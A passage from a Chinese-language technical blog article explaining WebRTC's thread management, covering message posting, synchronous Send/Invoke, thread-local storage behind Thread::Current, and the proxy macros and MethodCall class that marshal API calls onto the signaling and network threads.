                  MessageHandler* phandler,
                  uint32_t id,
                  MessageData* pdata,
                  bool time_sensitive) {
  RTC_DCHECK(!time_sensitive);
  if (IsQuitting()) {
    delete pdata;
    return;
  }

  // Keep thread safe
  // Add the message to the end of the queue
  // Signal for the multiplexer to return

  {
    CritScope cs(&crit_);
    Message msg;
    msg.posted_from=posted_from;
    msg.phandler=phandler;
    msg.message_id=id;
    msg.pdata=pdata;
    messages_.push_back(msg);
  }
  WakeUpSocketServer();
}

void Thread::WakeUpSocketServer() {
  ss_->WakeUp();
}

Post函数实现非常简单清晰,构造一个Message添加到队列,然后调用ss_->WakeUp()唤醒Wait,ss_是一个SocketServer对象,后面在分析, 先看同步Invoke

file://src/rtc_base/thread.h:388

template <
      class ReturnT,
      typename=typename std::enable_if<!std::is_void<ReturnT>::value>::type>
  ReturnT Invoke(const Location& posted_from, FunctionView<ReturnT()> functor) {
    ReturnT result;
    InvokeInternal(posted_from, [functor, &result] { result=functor(); });
    return result;
  }

  template <
      class ReturnT,
      typename=typename std::enable_if<std::is_void<ReturnT>::value>::type>
  void Invoke(const Location& posted_from, FunctionView<void()> functor) {
    InvokeInternal(posted_from, functor);
  }

两个重载函数一个有返回结果,一个没有,内部都调用InvokeInternal完成,InvokeInternal紧接着调用了Send函数

file://src/rtc_base/http://thread.cc:914

void Thread::Send(const Location& posted_from,
                  MessageHandler* phandler,
                  uint32_t id,
                  MessageData* pdata) {
  RTC_DCHECK(!IsQuitting());
  if (IsQuitting())
    return;

  // Sent messages are sent to the MessageHandler directly, in the context
  // of "thread", like Win32 SendMessage. If in the right context,
  // call the handler directly.
  Message msg;
  msg.posted_from=posted_from;
  msg.phandler=phandler;
  msg.message_id=id;
  msg.pdata=pdata;
  if (IsCurrent()) {
#if RTC_DCHECK_IS_ON
    RTC_DCHECK_RUN_ON(this);
    could_be_blocking_call_count_++;
#endif
    msg.phandler->OnMessage(&msg);
    return;
  }

  AssertBlockingIsAllowedOnCurrentThread();

  Thread* current_thread=Thread::Current();

#if RTC_DCHECK_IS_ON
  if (current_thread) {
    RTC_DCHECK_RUN_ON(current_thread);
    current_thread->blocking_call_count_++;
    RTC_DCHECK(current_thread->IsInvokeToThreadAllowed(this));
    ThreadManager::Instance()->RegisterSendAndCheckForCycles(current_thread,
                                                             this);
  }
#endif

  // Perhaps down the line we can get rid of this workaround and always require
  // current_thread to be valid when Send() is called.
  std::unique_ptr<rtc::Event> done_event;
  if (!current_thread)
    done_event.reset(new rtc::Event());

  bool ready=false;
  PostTask(webrtc::ToQueuedTask(
      [&msg]() mutable { msg.phandler->OnMessage(&msg); },
      [this, &ready, current_thread, done=done_event.get()] {
        if (current_thread) {
          CritScope cs(&crit_);
          ready=true;
          current_thread->socketserver()->WakeUp();
        } else {
          done->Set();
        }
      }));

  if (current_thread) {
    bool waited=false;
    crit_.Enter();
    while (!ready) {
      crit_.Leave();
      current_thread->socketserver()->Wait(kForever, false);
      waited=true;
      crit_.Enter();
    }
    crit_.Leave();

    // Our Wait loop above may have consumed some WakeUp events for this
    // Thread, that weren't relevant to this Send.  Losing these WakeUps can
    // cause problems for some SocketServers.
    //
    // Concrete example:
    // Win32SocketServer on thread A calls Send on thread B.  While processing
    // the message, thread B Posts a message to A.  We consume the wakeup for
    // that Post while waiting for the Send to complete, which means that when
    // we exit this loop, we need to issue another WakeUp, or else the Posted
    // message won't be processed in a timely manner.

    if (waited) {
      current_thread->socketserver()->WakeUp();
    }
  } else {
    done_event->Wait(rtc::Event::kForever);
  }
}

Send函数的代码比较多,不过整体思路还是很清晰

  • 如果调用Send的线程就是Send所拥有的当前线程,直接运行Message中的OnMessage,不需要任务派遣
  • 不在同一个线程,调用PostTask将消息传递对应线程,这里读者可能会有一个疑问这个PostTask中的任务被派遣到什么线程了,如果你有一个Thread对象workerThread,你现在再main线程中调用workerThread.PostTask,这个任务将会被投递到你创建的Thread对象管理的的线程中,也就是workerThread中。
  • 任务被PostTask到对应线程中之后,存在两种情况,再函数运行之前或者之后,线程已经释放
  • 如果线程已经释放,仅仅等待一个函数执行完成的Event信号
  • 线程还存在,等待消息执行完成,执行完成之后再调用一次WakeUp,注释中也非常详细的解释了为什么需要再执行完成之后再调用一次WakeUp,原因就是再while(!ready) {... current_thread->socketserver()->Wait()}中可能会消费掉一些外部触发的WakeUp事件,如果在执行完成之后不调用一次WakeUp可能导致外部新Post的消息无法被即时消费

消息投递、派遣、获取状态转移图

为了更加清楚的了解WebRTC的消息投递、派遣、获取机制,我自己定义了4种状态,方便理解

  • Idel状态:通过调用Start,并且还没有调用Get函数前
  • Wait状态:通过调用Get函数,将Idel状态转换成Wait状态
  • Ready状态:通过调用Post状态从而触发Waitup,将Wait状态转换成Ready状态
  • Running状态:通过调用Dispatch进行消息的处理,转换成Running状态

Current实现机制

提出疑问点:如果我想要在代码任意位置获取当前线程的Thread对象,要怎么做?单例?

看看WebRTC Thread的Current函数原型:

class Thread {
  public:
    //......
    static Thread* Current();
}

当我们在线程A调用Thread::Current将会获得一个线程A的Thread对象,在线程B调用Thread::Current将会获取一个线程B的Thread对象, 来看看内部实现

// static
Thread* Thread::Current() {
  ThreadManager* manager=ThreadManager::Instance();
  Thread* thread=manager->CurrentThread();

#ifndef NO_MAIN_THREAD_WRAPPING
  // Only autowrap the thread which instantiated the ThreadManager.
  if (!thread && manager->IsMainThread()) {
    thread=new Thread(CreateDefaultSocketServer());
    thread->WrapCurrentWithThreadManager(manager, true);
  }
#endif

  return thread;
}

核心实现都在ThreadManager中,ThreadManager是针对WebRTC Thread提供的一个管理类,里面会存放所有外部创建的Thread

Thread* ThreadManager::CurrentThread() {
  return static_cast<Thread*>(TlsGetValue(key_));
}

ThreadManager::CurrentThread实现很简单,通过TlsGetValue获取了私有变量key_,那这个key_肯定有Set操作,没错,这个key_的Set操作,是在Thread的构造函数中进行的 Thraed() -> DoInit() -> ThreadManager::SetCurrentThread -> ThreadManager::SetCurrentThreadInternal

void ThreadManager::SetCurrentThreadInternal(Thread* thread) {
  TlsSetValue(key_, thread);
}

TlsSetValue和TlsGetValue是什么意思? 这里涉及到了一个知识点,也就是TLS

TLS介绍

TLS全称是Thread Local Storage 线程局部变量或者线程私有变量,私有的意思是每个线程都将独自拥有这个变量

  • 在Windows中采用TlsAlloc获取进程中一个未使用的TLS slot index,使用TlsSetValue进行值的设置,TlsGetValue进行值的获取
  • 在linux中采用pthread_key_create、pthread_getspecific、pthread_setspecific对TLS进行操作
  • C++11中采用thread_local


详细链接:
www.notion.so/TLS-78870a0…
www.notion.so/TLS-78870a0…

回归Current函数实现,它就是借助了TLS技术得以实现在不同线程存储属于自己的私有变量(这个私有变量就是Thread*),然后再对应线程调用Current获取到的Thread*也就是当前线程的了

WebRTC线程Proxy机制

前面有提到,WebRTC对外暴露的API比如PeerConnectionInterface在内部都一层代理机制,来确保每一个API调用在正确的线程,先看PeerConnectiontProxy

file://src/api/peer_connection_proxy.h

BEGIN_PROXY_MAP(PeerConnection)
PROXY_PRIMARY_THREAD_DESTRUCTOR()
PROXY_METHOD0(rtc::scoped_refptr<StreamCollectionInterface>, local_streams)
PROXY_METHOD0(rtc::scoped_refptr<StreamCollectionInterface>, remote_streams)
PROXY_METHOD1(bool, AddStream, MediaStreamInterface*)
PROXY_METHOD1(void, RemoveStream, MediaStreamInterface*)
PROXY_METHOD2(RTCErrorOr<rtc::scoped_refptr<RtpSenderInterface>>,
              AddTrack,
              rtc::scoped_refptr<MediaStreamTrackInterface>,
              const std::vector<std::string>&)
// ......

// This method will be invoked on the network thread. See
// PeerConnectionFactory::CreatePeerConnectionOrError for more details.
PROXY_SECONDARY_METHOD1(rtc::scoped_refptr<DtlsTransportInterface>,
                        LookupDtlsTransportByMid,
                        const std::string&)
// This method will be invoked on the network thread. See
// PeerConnectionFactory::CreatePeerConnectionOrError for more details.
PROXY_SECONDARY_CONSTMETHOD0(rtc::scoped_refptr<SctpTransportInterface>,
                             GetSctpTransport)   

上面的一堆宏,会生成一个PeerConnectionProxyWithInternal类,我们主要看三个宏 BEGIN_PROXY_MAP、PROXY_METHOD0、PROXY_SECONDARY_METHOD1

BEGIN_PROXY_MAP


#define BEGIN_PROXY_MAP(c)                                                   \
  PROXY_MAP_BOILERPLATE(c)                                                   \
  SECONDARY_PROXY_MAP_BOILERPLATE(c)                                         \
  REFCOUNTED_PROXY_MAP_BOILERPLATE(c)                                        \
 public:                                                                     \
  static rtc::scoped_refptr<c##ProxyWithInternal> Create(                    \
      rtc::Thread* primary_thread, rtc::Thread* secondary_thread,            \
      INTERNAL_CLASS* c) {                                                   \
    return rtc::make_ref_counted<c##ProxyWithInternal>(primary_thread,       \
                                                       secondary_thread, c); \
  }
  
// Helper macros to reduce code duplication.
#define PROXY_MAP_BOILERPLATE(c)                          \
  template <class INTERNAL_CLASS>                         \
  class c##ProxyWithInternal;                             \
  typedef c##ProxyWithInternal<c##Interface> c##Proxy;    \
  template <class INTERNAL_CLASS>                         \
  class c##ProxyWithInternal : public c##Interface {      \
   protected:                                             \
    typedef c##Interface C;                               \
                                                          \
   public:                                                \
    const INTERNAL_CLASS* internal() const { return c_; } \
    INTERNAL_CLASS* internal() { return c_; }

看重点, 第一typedef c##ProxyWithInternal<c##Interface> c##Proxy;, 也就是外部使用的类名采用PeerConnectionProxy, c##ProxyWithInternal: public c##Interface,也就是继承自PeerConnectionInterface类,也就是我们在外部拿到的PeerConnect指针对象,其实是PeerConnectionProxyWithInternal对象, 重点2 , Create函数,这个Create函数会在什么时候调用,并且primary_thread和secondary_thread分别对应着什么线程,看下面代码


RTCErrorOr<rtc::scoped_refptr<PeerConnectionInterface>>
PeerConnectionFactory::CreatePeerConnectionOrError(
    const PeerConnectionInterface::RTCConfiguration& configuration,
    PeerConnectionDependencies dependencies) {

  rtc::scoped_refptr<PeerConnectionInterface> result_proxy=PeerConnectionProxy::Create(signaling_thread(), network_thread(),
                                  result.MoveValue());
  return result_proxy;
}

通过上面的代码可以确定,在PeerConnectionProxy类中primary_thread对应的就是signaling_thread,secondary_thread线程就是network_thread线程

PROXY_METHOD0

#define PROXY_METHOD0(r, method)                         \
  r method() override {                                  \
    MethodCall<C, r> call(c_, &C::method);               \
    return call.Marshal(RTC_FROM_HERE, primary_thread_); \
  }

创建MethodCall类,并调用Marshal,注意调用Marshal传入的参数primary_thread_ ,在PeerConnectionProxy中也就是,signaling_thread

PROXY_SECONDARY_METHOD1

#define PROXY_SECONDARY_METHOD1(r, method, t1)                \
  r method(t1 a1) override {                                  \
    MethodCall<C, r, t1> call(c_, &C::method, std::move(a1)); \
    return call.Marshal(RTC_FROM_HERE, secondary_thread_);    \
  }

与PROXY_METHOD不同的是在调用Marshal时传入的是secondary_thread_,在PeerConnectionProxy也就是network_thread

MethodCall

template <typename C, typename R, typename... Args>
class MethodCall : public QueuedTask {
 public:
  typedef R (C::*Method)(Args...);
  MethodCall(C* c, Method m, Args&&... args)
      : c_(c),
        m_(m),
        args_(std::forward_as_tuple(std::forward<Args>(args)...)) {}

  R Marshal(const rtc::Location& posted_from, rtc::Thread* t) {
    if (t->IsCurrent()) {
      Invoke(std::index_sequence_for<Args...>());
    } else {
      t->PostTask(std::unique_ptr<QueuedTask>(this));
      event_.Wait(rtc::Event::kForever);
    }
    return r_.moved_result();
  }

 private:
  bool Run() override {
    Invoke(std::index_sequence_for<Args...>());
    event_.Set();
    return false;
  }

  template <size_t... Is>
  void Invoke(std::index_sequence<Is...>) {
    r_.Invoke(c_, m_, std::move(std::get<Is>(args_))...);
  }

  C* c_;
  Method m_;
  ReturnType<R> r_;
  std::tuple<Args&&...> args_;
  rtc::Event event_;
};

主要看Marshal函数,如果是在当前线程直接调用Invoke,否则调用PostTask将任务投递到指定线程,并等待运行完成. 关于std::tuple 的使用可以查看官方文档,上面的代码用到了两个C++14的新特性 std::index_sequence_for和 std::get 来辅助tuple的使用

作者:spider集控团队
原文 WebRTC线程管理学习 - 掘金